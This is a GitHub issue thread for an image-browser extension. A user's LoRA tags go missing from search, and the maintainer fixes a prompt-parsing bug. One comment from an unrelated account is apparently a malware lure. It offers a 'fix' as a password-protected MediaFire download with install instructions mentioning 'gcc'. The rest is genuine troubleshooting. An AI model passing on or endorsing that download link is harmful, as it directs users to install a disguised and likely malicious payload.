### ISSUE TITLE
Some LoRA is missing from search

### ISSUE THREAD

**Issue by nemesiscompletion** [zanllp/sd-webui-infinite-image-browsing#727]
I found about search function from last week, which I find very helpful to figure out which LoRA files I used to create which images

However, from yesterday, I noticed some of the LoRA files are missing from tags from search
The file is definitely there, and I searched for both the file name and the name LoRA tags but neither of them show up
Weird thing is, that particular LoRA tags showed up like 5 days ago, so I don't know why it doesn't show up anymore
I updated SD Forge and Infinite image browsing extension just to see if it'd fix it but it didn't

The LORA file I'm referring to is this one
https://civitai.com/models/385004?modelVersionId=438767
The file name is Bdsm_Feet.safetensors, and for prompt < lora:Bdsm_Feet:1 > (without the space)
From search under LoRA tags, it appeared as Bdsm Feet some days ago, but from yesterday, it completely disappeared

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by nemesiscompletion** [comment]
I just tried Rebuild image index to see if it'd fix it but I'm still seeing some LoRA tags are still missing from the search
I ran it twice just in case when it didn't work first time, and closed webui and restarted to see if it makes any difference but I'm still not seeing some of LoRA tags

The reason I know the LoRA tags are missing is because I have been replacing LoRA preview images one at a time with the images I created myself. So for the images that already have images I created myself as preview, it means I was able to search them fine but I noticed couple of them are missing completely for some reason

**Comment by zanllp** [comment]
Possibly caused by a parsing error. Could you provide the source files of those images for me to debug?

**Comment by nemesiscompletion** [comment]
Oh, images I created myself?
Okay, I just had to make something that isn't NSFW (though it still may not be so safe)
![00028-1498175168](https://github.com/user-attachments/assets/bc758e1b-2585-4fec-b2f7-7bbc1d2515af)
I just rebuild image index after creating this one but the LoRA tag still doesn't show up

Among the LoRAs used for this image, Bdsm_Feet is the one that doesn't show up

**Comment by zanllp** [comment]
It seems that the parsing error occurred because "lora" wasn't separated by a comma. I will make it compatible with this situation in a few days.

**Comment by zanllp** [comment]
Update to the IIB latest version, then rebuild the index to handle existing data.

**Comment by nemesiscompletion** [comment]
Thank you so much
They are all showing now :)
